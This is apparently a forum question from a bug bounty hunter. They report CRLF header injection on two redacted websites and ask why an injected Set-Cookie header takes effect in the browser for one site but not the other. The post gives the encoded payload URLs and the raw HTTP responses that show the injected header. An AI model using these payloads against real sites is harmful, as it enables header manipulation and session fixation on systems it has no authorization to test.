Cookie is not being set after CRLF Injection in one domain but set in another domain. How can i bypass/set it?


Ok i am facing a very weird behaviour that sets and doesnt set cookie both. So, first i have found CRLF injection in 2 domains, redacted.de and redacted_another.com. When i go to redacted_another.com vulnerable url, the cookie gets set into firefox-esr. This works in browser. There first vulnerable domain i encountered had this url:

https://www.redacted_another.com/lp/%0ASet-Cookie:%20dipesh=yadav

I can view cookies using developers tool. This is default behaviour as i think. The next domain i encountered had this vulnerable urls but it didnt work in browser 🙁 :

http://www.redacted.de/forum/%0aSet-Cookie:%20dipesh=yadav http://www.redacted.de/sso/registration/account/%3f%0d%0aSet-Cookie:%20dipesh=yadav 

But when i visit this any urls from redacted.de it doest work in browser. Also, both redacted_another.com and redacted.de sets cookie in curl response. This is what it looks like for both redacted but the first one works in browser and second doesnt in browser. Working Curl request:

root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav  HTTP/2 301  date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 185 location: https://www.redacted.com/lp/redirects/?olp=/lp/ set-cookie: dipesh=yadav expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800  HTTP/2 200  date: Thu, 13 Aug 2020 15:02:53 GMT content-type: text/html content-length: 1452 vary: Accept-Encoding last-modified: Tue, 04 Feb 2020 15:54:26 GMT etag: "redacted" expires: Thu, 20 Aug 2020 15:02:53 GMT cache-control: max-age=604800 access-control-allow-origin: * accept-ranges: bytes 

NOT WORKING REQUEST:

root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz  HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 13 Aug 2020 15:05:04 GMT Content-Type: text/html Content-Length: 162 Location: https://www.redacted.de/sso/registration/account/ Set-Cookie: bugbounty=bugbountyplz Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT Cache-Control: private Age: 0 X-Frame-Options: DENY X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Connection: keep-alive  HTTP/2 200  server: nginx date: Thu, 13 Aug 2020 15:05:05 GMT content-type: text/html; charset=UTF-8 vary: Accept-Encoding access-control-allow-credentials: true access-control-allow-origin: https://www.redacted.de last-modified: Thu, 13 Aug 2020 15:05:05 GMT cache-control: no-cache, private age: 0 strict-transport-security: max-age=15768000 x-frame-options: DENY x-xss-protection: 1; mode=block x-content-type-options: nosniff accept-ranges: bytes  

Can anyone help me with this? Whats the problem that doesnt letme set cookie in redacted.de but i can set cookie in redacted_another.com.